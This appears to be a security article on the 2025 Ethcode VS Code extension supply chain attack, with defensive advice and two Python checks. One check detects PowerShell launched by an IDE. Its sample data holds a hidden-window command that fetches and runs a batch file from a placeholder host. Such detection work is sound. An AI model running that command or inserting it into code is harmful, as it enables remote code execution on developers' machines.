Malicious Pull Request Hits 6,000+ Developers: How the Ethcode VS Code Extension Became a Supply Chain Attack Target
What happens when your favorite developer tool turns into a cybersecurity nightmare overnight? If you use the Ethcode VS Code extension, you might have just dodged a digital bullet. In June 2025, a savvy but malicious actor exploited a surprisingly simple weakness, the trust placed in a routine-looking pull request, to slip dangerous code into a popular open-source project. Over 6,000 developers were at risk, and most never saw it coming.
This story isn’t just another cautionary tale. It’s a wake-up call about the growing threat of supply chain attacks targeting developer environments. Whether you’re an engineer, team lead, or just someone who relies on open-source tools, understanding what happened with Ethcode could help you avoid becoming the next victim.
Let’s dive into how a single pull request nearly turned a trusted VS Code extension into a Trojan horse, and what this means for the future of software supply chain security.
What Is Ethcode and Why Did It Matter?
Before we dissect the attack, let’s get our bearings.
Ethcode is a Visual Studio Code extension designed for Ethereum smart contract developers. Released in 2022 by user 7finney, Ethcode lets users deploy and execute Solidity contracts on Ethereum Virtual Machine (EVM)-based blockchains. For context, the EVM is the engine that powers smart contracts—the code that runs decentralized applications on Ethereum.
In short: If you build on Ethereum (or related blockchains), Ethcode is a handy tool.
- Over 6,000 installations: While not as massive as some tools, that’s a significant user base—all developers working at the bleeding edge of blockchain tech.
- Open-source: The code is public, collaborative, and frequently updated via GitHub, making it a prime target for attackers.
But why did Ethcode become such an attractive target? Because developer tools, especially those used to manage code, contracts, and keys, are gateways to sensitive assets. Compromise one, and you compromise the whole workflow.
The Malicious Pull Request: Anatomy of a Supply Chain Attack
Let’s break down exactly how the attack unfolded.
The Setup: Dormant but Valuable
- Last good update: September 2024. The project had been inactive for about nine months—a common pattern for open-source tools.
- Enter the attacker: On June 17, 2025, a new GitHub user named Airez299 submitted a pull request (PR) with the innocuous message:
“Modernize codebase with viem integration and testing framework.”
This sounded like exactly what the project needed. The PR claimed to modernize Ethcode, add a new testing framework, update dependencies, and remove outdated configurations.
The Hidden Threat: Two Malicious Lines in 4,000+ Changes
The attacker played it smart. They made 43 commits and changed roughly 4,000 lines of code. Buried in these updates were just two lines that spelled disaster:
- The addition of an npm dependency, “keythereum-utils”, in package.json.
- An import statement in src/extension.ts to pull in this dependency.
At first glance, these changes blended in with legitimate updates. But beneath the surface, they were the tip of a malware iceberg.
The Payload: Obfuscated JavaScript Goes to Work
So, what did “keythereum-utils” actually do?
- Heavily obfuscated code: After reverse engineering, researchers found it would silently spawn a hidden PowerShell process.
- Second-stage download: The PowerShell script would then fetch and run a batch file from a public file-hosting service.
- Unknown payload: While the final purpose isn’t fully known, evidence suggests it could steal cryptocurrency assets, exfiltrate secrets, or poison smart contracts.
The npm package was downloaded 495 times before being taken down. The accounts used to upload it were fresh, single-use, and have since disappeared.
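As an added illustration (not code from the article or from the ReversingLabs analysis), here is how a defender could express the behaviour described above as detection logic over process-creation telemetry. The sample events, the parent-image list and the file-hosting host name are constructed assumptions; the indicators are the ones the text names: a hidden PowerShell window, spawned from the IDE, fetching and running a batch file.

```python
import re

# Parent images an IDE extension host would spawn children from
# (assumption: VS Code runs extensions under Code.exe or node).
IDE_PARENTS = {"code.exe", "node.exe", "node"}
HIDDEN_RE = re.compile(r"-w\w*\s+hidden", re.I)          # -w, -win, -WindowStyle Hidden
DOWNLOAD_RE = re.compile(r"invoke-webrequest|\biwr\b|downloadfile|downloadstring|\bcurl\b", re.I)
BATCH_RE = re.compile(r"\.(?:bat|cmd)\b", re.I)

# Constructed process-creation events; the host name is a placeholder, not a real IoC.
SAMPLE_EVENTS = [
    {"image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent_image": r"C:\Users\dev\AppData\Local\Programs\Microsoft VS Code\Code.exe",
     "cmdline": "powershell.exe -w hidden -c \"iwr https://files.example.invalid/s.bat "
                "-OutFile $env:TEMP\\s.bat; cmd /c $env:TEMP\\s.bat\""},
    {"image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent_image": r"C:\Windows\explorer.exe",
     "cmdline": "powershell.exe -NoProfile -File build.ps1"},
    {"image": r"C:\Program Files\Git\bin\git.exe",
     "parent_image": r"C:\Users\dev\AppData\Local\Programs\Microsoft VS Code\Code.exe",
     "cmdline": "git fetch origin"},
]

def indicators(event):
    """List which of the article's behaviours one PowerShell launch shows."""
    image = event["image"].rsplit("\\", 1)[-1].lower()
    if image not in ("powershell.exe", "pwsh.exe"):
        return []
    hits = []
    if event["parent_image"].rsplit("\\", 1)[-1].lower() in IDE_PARENTS:
        hits.append("spawned_by_ide")
    cmd = event["cmdline"]
    if HIDDEN_RE.search(cmd):
        hits.append("hidden_window")
    if DOWNLOAD_RE.search(cmd):
        hits.append("remote_download")
    if BATCH_RE.search(cmd):
        hits.append("batch_file")
    return hits

def suspicious_events(events, min_hits=3):
    """Return (event, hits) for launches combining at least min_hits indicators."""
    flagged = []
    for event in events:
        hits = indicators(event)
        if len(hits) >= min_hits:
            flagged.append((event, hits))
    return flagged
```

Requiring several indicators together keeps a lone `-WindowStyle Hidden` in a build script from paging anyone, while the combination the article describes still stands out.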
If you’re curious about the technical investigation, ReversingLabs published a detailed breakdown of it.
How the Attack Was Detected—and Stopped
The attack was sophisticated, but not invisible.
- Responsible disclosure: Security researchers at ReversingLabs flagged the malicious pull request, analyzed the code, and reported their findings to Microsoft.
- Marketplace removal: The extension was swiftly pulled from the VS Code Extensions Marketplace.
- Cleanup: The Ethcode maintainers removed the malicious dependency, and Microsoft reinstated the extension after a thorough review.
This response is a rare success story—many similar attacks go undetected for much longer.
Why Supply Chain Attacks Are Skyrocketing
Now, you might be wondering: “Is this just a fluke, or part of a bigger trend?” Unfortunately, it’s the latter.
The Bigger Picture: A Surge in Open-Source Malware
- 16,279 pieces of open-source malware were discovered in Q2 2025—a 188% year-over-year increase (source: Sonatype).
- Over 4,400 packages targeted credential and API token theft.
- Data corruption malware doubled, with over 400 unique packages designed to damage files or sabotage infrastructure.
Why Is This Happening?
- Trust in the open-source ecosystem: Developers often assume code on npm, PyPI, or GitHub is safe—especially when it’s widely used.
- Automation: Attackers now use bots to create packages, set up accounts, and push malicious updates at scale.
- Throwaway accounts: Just like Airez299, attackers spin up new identities specifically to inject malware into dormant or unguarded projects.
Let me put it simply:
As the world embraces open-source, attackers have realized it’s easier to compromise one package than to hack thousands of individual companies.
Well-Known Supply Chain Attackers: Lazarus Group and Yeshen-Asia
This isn’t just a random phenomenon. Notable threat actors have jumped on the bandwagon.
Lazarus Group (North Korea-Linked)
- 107 malicious packages attributed to this advanced group, downloaded over 30,000 times.
- Specializes in credential theft and espionage—often hitting developer tools and cryptocurrency projects.
Yeshen-Asia (China-Linked Cluster)
- Over 90 npm packages associated with this cluster.
- Active since December 2024, focused on harvesting system information and process lists.
- Packages were published under distinct author accounts, each hosting only one malicious component—making detection harder.
- Infrastructure was cleverly hidden behind Cloudflare-protected domains.
These campaigns are persistent, deliberate, and increasingly automated.
For a deeper look, check out Sonatype’s research on supply chain attacks.
Browser Extensions: The Next Frontier for Malicious Attacks
It’s not just code packages. Browser extensions—often trusted and granted broad permissions—are also in attackers’ crosshairs.
Recent Example: Fake Gaming Extensions in Firefox Add-ons Store
- Eight fake extensions (e.g., “CalSyncMaster”, “VPN – Grab a Proxy – Free”, “Five Nights at Freddy’s”) were found with features ranging from adware to Google OAuth token theft.
- Published by a single actor (“mre1903”), they:
- Redirected users to gambling sites
- Served fake virus alerts
- Injected persistent tracking iframes
- Hijacked shopping sessions for affiliate commissions
According to Socket’s research, this shows how quickly browser threats evolve—from simple scams to advanced credential and data theft.
How Can Developers and Teams Protect Themselves?
You might be thinking: “If even popular tools can be weaponized, is anything safe?”
Here’s the good news: Awareness is your first and best defense. Let’s talk actionable steps.
1. Scrutinize Pull Requests—Especially from New Contributors
- Look for PRs from accounts with no history or activity.
- Be wary of large, sweeping updates—especially after long dormancy.
- Prioritize code reviews and require multiple maintainers to approve changes.
2. Monitor Dependencies Proactively
- Use tools like Snyk, Socket, or npm audit to scan for known vulnerabilities and suspicious packages.
- Avoid adding new dependencies without vetting their source, history, and maintainers.
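The two lines buried in the 4,000-line Ethcode PR (a new dependency in package.json and an import in src/extension.ts) are exactly what an automated pre-review check can pull out of the noise, which serves both the attack anatomy described earlier and step 2’s advice to vet new dependencies. The Python below is added here and is not the project’s or the article’s own code; the diff it parses is constructed to mirror the description, and the version strings in it are invented.

```python
import re
# Constructed diff modelled on the article's description, not the real PR.
SAMPLE_DIFF = """\
diff --git a/package.json b/package.json
--- a/package.json
+++ b/package.json
@@ -20,4 +20,5 @@
   "dependencies": {
-    "ethers": "^5.7.0",
+    "ethers": "^6.0.0",
+    "keythereum-utils": "^1.0.0",
     "viem": "^2.0.0"
diff --git a/src/extension.ts b/src/extension.ts
--- a/src/extension.ts
+++ b/src/extension.ts
@@ -1,2 +1,3 @@
 import * as vscode from 'vscode';
+import 'keythereum-utils';
 import { helper } from './utils';
"""

# One `"name": "version"` entry inside a dependencies block.
DEP_LINE = re.compile(r'^\s*"([^"]+)"\s*:\s*"[^"]*",?\s*$')
# An ES import or require() whose specifier is a package, not a relative path.
IMPORT_LINE = re.compile(r"""^\s*(?:import\b[^'"]*|.*\brequire\()\s*['"]([^'"./][^'"]*)['"]""")

def changed_lines(diff):
    """Map each file in a unified diff to its (sign, text) pairs for +/- lines."""
    files, path = {}, None
    for raw in diff.splitlines():
        if raw.startswith("diff --git"):
            path = raw.split(" b/", 1)[1]
            files[path] = []
        elif raw[:1] in ("+", "-") and not raw.startswith(("+++", "---")):
            files[path].append((raw[0], raw[1:]))
    return files

def review_diff(diff):
    """Return {'new_dependencies': [names], 'new_imports': [(file, module)]}."""
    findings = {"new_dependencies": [], "new_imports": []}
    for path, lines in changed_lines(diff).items():
        if path.endswith("package.json"):
            # A name that also appears on a '-' line is a version bump, not a new package.
            removed = {m.group(1) for s, t in lines if s == "-" and (m := DEP_LINE.match(t))}
            findings["new_dependencies"] += [m.group(1) for s, t in lines if s == "+"
                                             and (m := DEP_LINE.match(t)) and m.group(1) not in removed]
        elif path.endswith((".ts", ".js", ".mjs", ".cjs")):
            findings["new_imports"] += [(path, m.group(1)) for s, t in lines
                                        if s == "+" and (m := IMPORT_LINE.match(t))]
    return findings
```

Run it in CI on `git diff origin/main...HEAD` and block the merge until every name it reports has been vetted by a maintainer; version bumps of packages already in the tree are left to the regular audit tooling.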
3. Lock Down Publishing and Release Pipelines
- Limit who can publish or merge updates in your repositories.
- Implement two-factor authentication on npm, GitHub, and other platforms.
- Set up automated alerts for new package versions or dependency changes.
4. Stay Informed and Educated
- Follow reputable security blogs and advisories (KrebsOnSecurity, The Hacker News).
- Encourage your team to share information about new threats and best practices.
5. Use Extension Sandboxing and Permissions
- Only install browser or IDE extensions from trusted sources.
- Regularly review and prune extensions. Remove anything you don’t need.
- Pay attention to what permissions an extension requests—if it seems excessive, think twice before installing.
Real-World Lessons From the Ethcode Incident
Why does this attack matter so much? Here’s what the Ethcode incident teaches us:
- No project is too small or obscure to be targeted.
- Attackers are patient and subtle, willing to hide malicious code in the noise of legitimate updates.
- Supply chain security is everyone’s responsibility—from maintainers to end-users.
It’s a stark reminder:
If you trust a tool enough to give it access to your code, your secrets, or your blockchain assets, you must also take steps to verify its integrity—every single time.
Frequently Asked Questions (FAQ)
What is a software supply chain attack?
A supply chain attack targets the tools, libraries, or infrastructure you use to build software—often by injecting malicious code into popular open-source packages or updates. Hackers compromise trusted sources, so when you install or update, you unwittingly install malware.
How did the attacker compromise Ethcode?
The attacker created a new GitHub account and submitted a pull request to the Ethcode repository, claiming to modernize the codebase. Buried in thousands of legitimate-looking changes were two lines that added and imported a malicious npm package, which then downloaded further malware.
Was my system compromised if I used Ethcode?
If you installed or updated Ethcode after June 17, 2025, and before the package was removed from the marketplace, your system could be at risk. Security researchers recommend running malware scans, reviewing recent activity, and changing any potentially exposed credentials.
What should I do if I think I installed a compromised extension or package?
- Remove the extension immediately.
- Run a full malware and antivirus scan.
- Review recent system activity and look for unauthorized network connections or PowerShell activity.
- Change credentials, keys, or tokens that may have been exposed.
How can I stay safe from similar attacks in the future?
- Be vigilant about the software and extensions you use.
- Regularly update and audit dependencies.
- Enable security features like 2FA and code review requirements.
- Use monitoring tools to keep an eye on changes and vulnerabilities.
Are browser extensions really that risky?
Yes—because they operate within your browser’s security context and often have access to sensitive data, from passwords to browsing history. Only install extensions from trusted vendors, and routinely audit what’s running in your browser.
Where can I learn more about recent supply chain threats?
Check out these authoritative sources:
- ReversingLabs Blog
- Sonatype Security Research
- Socket Security Blog
Final Takeaway: Stay Alert, Stay Secure
The Ethcode supply chain attack is more than a “one-off” event. It’s a powerful example of how trust in open-source—and the tools we rely on daily—can be turned against us with shocking speed and sophistication.
Here’s the actionable insight:
Make security a habit, not an afterthought. Scrutinize updates, review dependencies, and foster a culture of vigilance within your team or organization. In an era where supply chain attacks are the new normal, being proactive is the best way to protect your projects, your assets, and your peace of mind.